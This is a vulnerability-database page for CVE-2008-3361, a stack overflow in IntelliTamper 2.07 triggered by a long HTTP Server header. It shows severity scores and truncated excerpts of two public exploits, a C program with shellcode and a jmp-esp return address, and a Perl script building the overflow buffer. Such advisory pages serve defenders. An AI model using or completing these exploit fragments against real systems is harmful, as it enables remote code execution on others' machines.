CVE-2008-3361
published 2008-07-29CVE-2008-3361: Stack-based buffer overflow in IntelliTamper 2.07 allows remote web sites to execute arbitrary code via a long HTTP Server header.
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
4.30%
89.9th percentile
Stack-based buffer overflow in IntelliTamper 2.07 allows remote web sites to execute arbitrary code via a long HTTP Server header.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intellitamper | intellitamper | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IntelliTamper 2.07 - HTTP Header Remote Code Execution
exploitdb·2008-08-10
CVE-2008-3361 IntelliTamper 2.07 - HTTP Header Remote Code Execution
IntelliTamper 2.07 - HTTP Header Remote Code Execution
---
/**
**
** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
**
** Based on exploit by Koshi (written in Perl). This one should be more
** stable. Just for fun and to learn more about win32 exploitation.
**
** by Wojciech Pawlikowski ([email protected])
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll
/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x30\x42\x31\x50\x41\x42\x6
Exploit-DB
IntelliTamper 2.07 - server header Remote Code Execution
exploitdb·2008-07-22
CVE-2008-3361 IntelliTamper 2.07 - server header Remote Code Execution
IntelliTamper 2.07 - server header Remote Code Execution
---
#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought i'd throw one in there.
# This example assumes you're scanning "http://127.0.0.1"
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"
# or even changing it as slightly as "http://127.0.0.1/"
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
#
use IO::Socket;
my $msg="";
my $overflow = "A"x1536;
my $fun = "".
"\xb3\x8d\x95\x7c". # EIP (0x7C958DB3 call esp NTDLL.DLL)
"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C". # More buffer.
"AAAA2Cb3Cb4CBBBB"; # Starts
No writeups or analysis indexed.
http://securityreason.com/securityalert/4059http://www.securityfocus.com/bid/30356https://exchange.xforce.ibmcloud.com/vulnerabilities/44147https://www.exploit-db.com/exploits/6118https://www.exploit-db.com/exploits/6227http://securityreason.com/securityalert/4059http://www.securityfocus.com/bid/30356https://exchange.xforce.ibmcloud.com/vulnerabilities/44147https://www.exploit-db.com/exploits/6118https://www.exploit-db.com/exploits/6227
2008-07-29
Published